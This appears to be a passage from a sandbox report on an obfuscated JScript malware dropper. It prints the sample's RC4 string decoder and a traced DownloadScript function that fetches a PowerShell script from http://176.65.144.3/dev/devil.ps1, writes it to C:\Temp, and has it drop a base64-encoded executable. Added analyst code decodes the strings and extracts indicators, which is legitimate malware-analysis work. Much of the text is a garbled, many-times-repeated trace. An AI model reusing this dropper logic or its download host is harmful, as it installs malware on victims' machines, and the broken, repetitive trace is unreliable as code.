    • function (f, g).pnaobb("W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC","xtav") ➔ "{%\xe2r:\x8c\xdci\xe9U\xc0\xca"\x86\x8a\x1741&\xb5\xe5\xf4\x0ci:\x9e"
    • function (f, g).pnaobb("nfn9c8ocWOiqEWddGSkU","Rs1)") ➔ "\xd8J\xfa\xeen\xb2\xc1\x0e\xa0\x81U"
    • function (f, g).pnaobb("mte0nZnJuuDNt0O","Ggh6") ➔ "\xc3\x10\xb1\xa5\x12\xda^\x0ft/G"
    var p = [], q = 0x0, r, t = '';
    n = i ( n );
    • i("vMtcJeFcKhtdUa7cG8kCpbTh") ➔ "Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG"
    • i("W6iXEKqyW58") ➔ "\xe21zD\x18\xdf"
    • i("wbSaW6/cIW") ➔ "X\x1b\x00\xef\x8b"
    • i("c8k1s8k5ASkEW5P4fmoVWONdJrW") ➔ "\x0b\xb5K\xb9j\x9e\xdax\x14\xef\x89\xcd\x1c"
    • i("WRtdPmoQkGOLgX7dSZ/cHG") ➔ "\xb4\xe4\xea* %\x1b\x1e\xf3?\x86"
    • i("s1vsiGzsWR3dOCkSW4hdKmki") ➔ "KUR"\x06R\xbd\xe1\xac\xc1\xd0\x88"
    • i("pLP2W4P5yMG") ➔ ">Zv\xcaybh"
    • i("W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC") ➔ "\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7"
    • i("nfn9c8ocWOiqEWddGSkU") ➔ "4S}\x0b\xc2\x82\x10{\x00\xc2\xae"
    • i("mte0nZnJuuDNt0O") ➔ "11473cQGgOJ"
    var u;
    for ( u = 0x0 ; u < 0x100 ; u ++ )
    {
      p[u] = u;
    }
    for ( u = 0x0 ; u < 0x100 ; u ++ )
    {
      q = ( q + p[u] + o['charCodeAt'] ( u % o['length'] ) ) % 0x100, r = p[u], p[u] = p[q], p[q] = r;
    }
    u = 0x0, q = 0x0;
    for ( var v = 0x0 ; v < n['length'] ; v ++ )
    {
      u = ( u + 0x1 ) % 0x100, q = ( q + p[u] ) % 0x100, r = p[u], p[u] = p[q], p[q] = r, t += String['fromCharCode'] ( n['charCodeAt'] ( v ) ^ p[( p[u] + p[q] ) % 0x100] );
    }
    return t;
  };
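The decoder `m` shown above is plain RC4: the first two loops are the key-scheduling algorithm keyed by `o.charCodeAt(u % o.length)`, the third loop is the PRGA XORed into the output of `i`, which is a base64 decoder with a custom alphabet. Because the key (`'Cto7'`, `'$atZ'`, ...) sits next to every call site, the string table can be resolved statically without running the script. The following is an added example, not code from the sample or from the sandbox report; it re-implements both stages in standalone JavaScript. The alphabet it ships with is the standard base64 alphabet, assumed here only so the example checks itself against public RC4 test vectors; the sample's own shuffled alphabet is defined elsewhere in the script and has to be pasted in for real use.

```javascript
// Added example: standalone re-implementation of the obfuscator's string decoder
// (custom-alphabet base64, then RC4). Not part of the sample or the report.

// ASSUMPTION: standard alphabet, used only for self-checking. Replace with the
// sample's shuffled alphabet to resolve its real string table.
const ASSUMED_ALPHABET =
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

// Base64 decode against an arbitrary 64-char alphabet (index 64 is padding).
// Returns a "binary string" (one char per byte), the form the sample's `i`
// produces and the form rc4() below consumes. Characters outside the alphabet
// are skipped rather than rejected, matching typical obfuscator decoders.
function b64DecodeWithAlphabet(str, alphabet = ASSUMED_ALPHABET) {
  let out = "", bits = 0, acc = 0;
  for (const ch of str) {
    const idx = alphabet.indexOf(ch);
    if (idx < 0 || idx > 63) continue;       // padding or junk character
    acc = (acc << 6) | idx;
    bits += 6;
    if (bits >= 8) {
      bits -= 8;
      out += String.fromCharCode((acc >>> bits) & 0xff);
      acc &= (1 << bits) - 1;                 // keep only the unconsumed bits
    }
  }
  return out;
}

// RC4 exactly as the sample writes it: KSA over key.charCodeAt(u % key.length),
// then PRGA XORed into data.charCodeAt(v). Symmetric, so it also encrypts.
function rc4(data, key) {
  const S = [];
  for (let u = 0; u < 256; u++) S[u] = u;
  let j = 0;
  for (let u = 0; u < 256; u++) {            // key scheduling
    j = (j + S[u] + key.charCodeAt(u % key.length)) % 256;
    [S[u], S[j]] = [S[j], S[u]];
  }
  let i = 0;
  j = 0;
  let out = "";
  for (let v = 0; v < data.length; v++) {    // keystream generation + XOR
    i = (i + 1) % 256;
    j = (j + S[i]) % 256;
    [S[i], S[j]] = [S[j], S[i]];
    out += String.fromCharCode(data.charCodeAt(v) ^ S[(S[i] + S[j]) % 256]);
  }
  return out;
}

// The accessor as the sample composes it: table entry -> base64 -> RC4 with the
// key supplied at the call site (e.g. m(0x20a, 'Cto7') resolving to "GET").
function decodeEntry(encoded, key, alphabet = ASSUMED_ALPHABET) {
  return rc4(b64DecodeWithAlphabet(encoded, alphabet), key);
}

// Hex view of a binary string, for comparing against published test vectors.
function toHex(s) {
  return Array.from(s, (c) => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}

// Quick self-check against the public RC4 vector Key/"Plaintext".
console.log(toHex(rc4("Plaintext", "Key")));          // bbf316e8d940af0ad3
console.log(decodeEntry("UGxhaW50ZXh0", "Key").length); // 9 bytes of RC4 output
```

To resolve the sample's strings, replace `ASSUMED_ALPHABET` with the alphabet from the script's own `i` function and call `decodeEntry(entry, key)` for each `(index, key)` pair seen at a call site; the obfuscator also rotates the table at start-up, so the index-to-entry mapping must be taken from the script, not from the array order as printed.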
  b['pnaobb'] = m, c = arguments, b['PNfjVi'] = ! ! [];
  }
  var j = e[0x0], k = f + j, l = c[k];
  return ! l ? ( b['qrjbpx'] === undefined && ( b['qrjbpx'] = ! ! [] ), h = b['pnaobb'] ( h, g ), c[k] = h ) : h = l, h;
  • function (f, g).pnaobb("vMtcJeFcKhtdUa7cG8kCpbTh","!fnS") ➔ ">\xbe j\x9c\xb7\xdb\x07-ld\x91\"
  • function (f, g).pnaobb("W6iXEKqyW58","xtav") ➔ "O\xaa6AmZ"
  • function (f, g).pnaobb("wbSaW6/cIW","Rs1)") ➔ "\xb4\x02\x87 '"
  • function (f, g).pnaobb("c8k1s8k5ASkEW5P4fmoVWONdJrW","Ggh6") ➔ "\xf9\x94\xce+K'\xd50\x07\x8f\x84\xb6\xb1"
  • function (f, g).pnaobb("WRtdPmoQkGOLgX7dSZ/cHG","wBd[") ➔ "\x02VF\xf7\x0b\xd4\xd8\xee\x94w3"
  • function (f, g).pnaobb("s1vsiGzsWR3dOCkSW4hdKmki","AqLr") ➔ ",\x00\xe7\\xa0\x16p\x84x\x19\xbc\xfc"
  • function (f, g).pnaobb("pLP2W4P5yMG","!fnS") ➔ "V\x80\xda\xe7u\xa1K"
  • function (f, g).pnaobb("W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC","xtav") ➔ "{%\xe2r:\x8c\xdci\xe9U\xc0\xca"\x86\x8a\x1741&\xb5\xe5\xf4\x0ci:\x9e"
  • function (f, g).pnaobb("nfn9c8ocWOiqEWddGSkU","Rs1)") ➔ "\xd8J\xfa\xeen\xb2\xc1\x0e\xa0\x81U"
  • function (f, g).pnaobb("mte0nZnJuuDNt0O","Ggh6") ➔ "\xc3\x10\xb1\xa5\x12\xda^\x0ft/G"
}, b ( c, d );
}
function DownloadScript(d, f) {
• DownloadScript("http://176.65.144.3/dev/devil.ps1","C:\Temp\WTRTRWFSHS.ps1") ➔ true
  var n = k, m = l;
  try
  {
    http['Open'] ( m ( 0x20a, 'Cto7' ), d, ! [] ), http['Send'] ( );
    • m(522,"Cto7") ➔ "GET"
    • Open("GET","http://176.65.144.3/dev/devil.ps1",false) ➔ undefined
    • Send() ➔ undefined
    if ( http[m ( 0x20d, '$atZ' ) ] === SUCCESS_STATUS )
    • m(525,"$atZ") ➔ "Status"
    {
      var g = fileSystem[m ( 0x1f8, '!M*A' ) ] ( f, ! ! [] );
      • m(504,"!M*A") ➔ "CreateTextFile"
      • CreateTextFile("C:\Temp\WTRTRWFSHS.ps1",true) ➔
      return g[m ( 0x1ff, 'xo^o' ) ] ( http[m ( 0x1fc, '1YUC' ) ] ), g[m ( 0x1f9, 'u)J%' ) ] ( ), ! ! [];
      • m(511,"xo^o") ➔ "Write"
      • m(508,"1YUC") ➔ "ResponseText"
      • Write("$SAFAGGAGXHXHX=[IO.Path]::Combine($env:TEMP,"QWQWSAADAF.exe") [IO.File]::WriteAllBytes($SAFAGGAGXHXHX,[Convert]::FromBase64String("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") ➔ undefined
      • m(505,"u)J%") ➔ "Close"
      • Close() ➔ undefined
    }
    else
      return LogError ( 'Download\x20failed\x20with\x20status:\x20' + http[n ( 0x202 ) ] ), ! [];
  }
  catch ( h )
  {
    return LogError ( m ( 0x1f7, 'BQU1' ) + h[m ( 0x1f0, 'Sp)8' ) ] ), ! [];
  }
}
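The trace interleaved with DownloadScript above is the whole download-and-drop chain in one place: the string accessor resolves "GET", "Status", "CreateTextFile", "Write", "ResponseText" and "Close" at the moment each is used, and the surrounding Open/Send/CreateTextFile/Close calls carry the URL and the dropped path. The following is an added example, not part of the sandbox report or of the sample: a small parser for the report's "• Call(args) ➔ result" lines that pulls those IOCs and the resolved string-table entries out of the trace and checks for the WinHTTP-to-FileSystemObject drop sequence. The sample lines are copied from the trace above (the Write line with the redacted PowerShell payload is left out); the regular expressions are this example's own heuristics, not the sandbox's format definition.

```javascript
// Added example: parse sandbox function-run lines and extract IOCs.
// Not part of the report or the sample. Trace lines below are copied from the
// DownloadScript trace on this page; the payload-carrying Write line is omitted.

const SAMPLE_TRACE = [
  '• DownloadScript("http://176.65.144.3/dev/devil.ps1","C:\\Temp\\WTRTRWFSHS.ps1") ➔ true',
  '• m(522,"Cto7") ➔ "GET"',
  '• Open("GET","http://176.65.144.3/dev/devil.ps1",false) ➔ undefined',
  '• Send() ➔ undefined',
  '• m(525,"$atZ") ➔ "Status"',
  '• m(504,"!M*A") ➔ "CreateTextFile"',
  '• CreateTextFile("C:\\Temp\\WTRTRWFSHS.ps1",true) ➔',
  '• m(511,"xo^o") ➔ "Write"',
  '• m(508,"1YUC") ➔ "ResponseText"',
  '• m(505,"u)J%") ➔ "Close"',
  '• Close() ➔ undefined',
];

// "• Name(args) ➔ result", optionally prefixed with "function (f, g)." as in
// the pnaobb lines. args is captured greedily up to the last ")" before "➔".
const RUN_LINE = /^\s*•\s*(?:function\s*\([^)]*\)\.)?([A-Za-z_$][\w$]*)\s*\((.*)\)\s*➔\s*(.*)$/;
const URL_RE = /https?:\/\/[^\s"',)]+/g;
const WIN_PATH_RE = /[A-Za-z]:\\[^"',)]+/g;
// WSH / MSXML / FSO methods that make up a download-and-drop chain (heuristic list).
const INTERESTING = new Set(["Open", "Send", "CreateTextFile", "Write", "Close", "Run", "ShellExecute", "Exec"]);

function parseRunLine(line) {
  const m = RUN_LINE.exec(line);
  if (!m) return null;
  return { call: m[1], args: m[2], result: m[3].trim() };
}

// Walk the trace once; collect URLs, Windows paths, the ordered API calls, and
// every m(index,"key") ➔ "literal" resolution as index -> decoded string.
function extractIocs(lines) {
  const urls = new Set(), paths = new Set(), apiCalls = [], resolvedStrings = new Map();
  for (const line of lines) {
    const run = parseRunLine(line);
    if (!run) continue;
    for (const u of run.args.match(URL_RE) || []) urls.add(u);
    for (const p of run.args.match(WIN_PATH_RE) || []) paths.add(p);
    if (INTERESTING.has(run.call)) apiCalls.push(run.call);
    if (run.call === "m" && run.result.startsWith('"')) {
      const idx = run.args.split(",")[0].trim();
      resolvedStrings.set(idx, JSON.parse(run.result));
    }
  }
  return { urls: [...urls], paths: [...paths], apiCalls, resolvedStrings };
}

// True when the calls contain the drop sequence as a subsequence (other calls
// may sit in between). Default chain is the one this trace exhibits.
function hasDropChain(apiCalls, chain = ["Open", "Send", "CreateTextFile", "Close"]) {
  let pos = 0;
  for (const c of apiCalls) if (c === chain[pos]) pos++;
  return pos === chain.length;
}

// Stand-alone usage: print the summary for the sample trace.
const report = extractIocs(SAMPLE_TRACE);
console.log(JSON.stringify({
  urls: report.urls,
  paths: report.paths,
  chain: report.apiCalls,
  dropChain: hasDropChain(report.apiCalls),
  strings: Object.fromEntries(report.resolvedStrings),
}, null, 2));
```

The resolved-string map is the useful by-product: sandbox traces already show which `(index, key)` pair produced which method name, so the same parser run over the whole report gives a partial dictionary of the string table without touching the RC4 decoder at all.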
function a() {
• a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
  var q = [ 'iCoHWQ95euBdJSkIhmoIxSoo', 's1vsiGzsWR3dOCkSW4hdKmki', 'nsPZWRmVDmojW6iZsW', 'WQriW7T3D8oCjtOdWPyMa8kY', 'WR3dI8klW6hcKa', 'WPZcONOXqmoDWQ4zFuqa', 'nhHpExzOuW', 'u3rHDhvZ', 'ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia', 'ndGYmuT5ugLpqG', 'qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq', 'q3jLyxrLt2jQzwn0', 'W53dRCoWvG', 'wCoIWP8znCoXehRdV8k0aCoByG', 'rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia', 'bSo1W4W', 'WOtcGSkzW6O4W4NdS8kjncddJefj', 'W4mtWRdcPeVdTwiGure', 'W6iXEKqyW58', 'W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC', 'nte0ndeXmKDIreTkDa', 'W57dGCkTW6ZcG8oEW48', 'fvbPW519D0G7W73dHrZdJa', 'W50PWR7dL8oGFSkGimoHkG', 'v1nJCMLWDc5tAgvSBa', 'Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX', 'vMtcJeFcKhtdUa7cG8kCpbTh', 'pLP2W4P5yMG', 'mZHLEwnXu3G', 'WRtdPmoQkGOLgX7dSZ/cHG', 'c8k1s8k5ASkEW5P4fmoVWONdJrW', 'mte0nZnJuuDNt0O', 'f8kJBKq', 'uNvU', 'WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy', 'oglcUxpcM8ocWRzJW4O7WOxdVbvt', 'wbSaW6/cIW', 'nfn9c8ocWOiqEWddGSkU' ];
                                                                                                                                                                                                                                                    114
                                                                                                                                                                                                                                                    a =
                                                                                                                                                                                                                                                      115
                                                                                                                                                                                                                                                      function () {
                                                                                                                                                                                                                                                      • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                      • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                      • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                      • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                      • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                      • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                      • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                      • a() ➔ 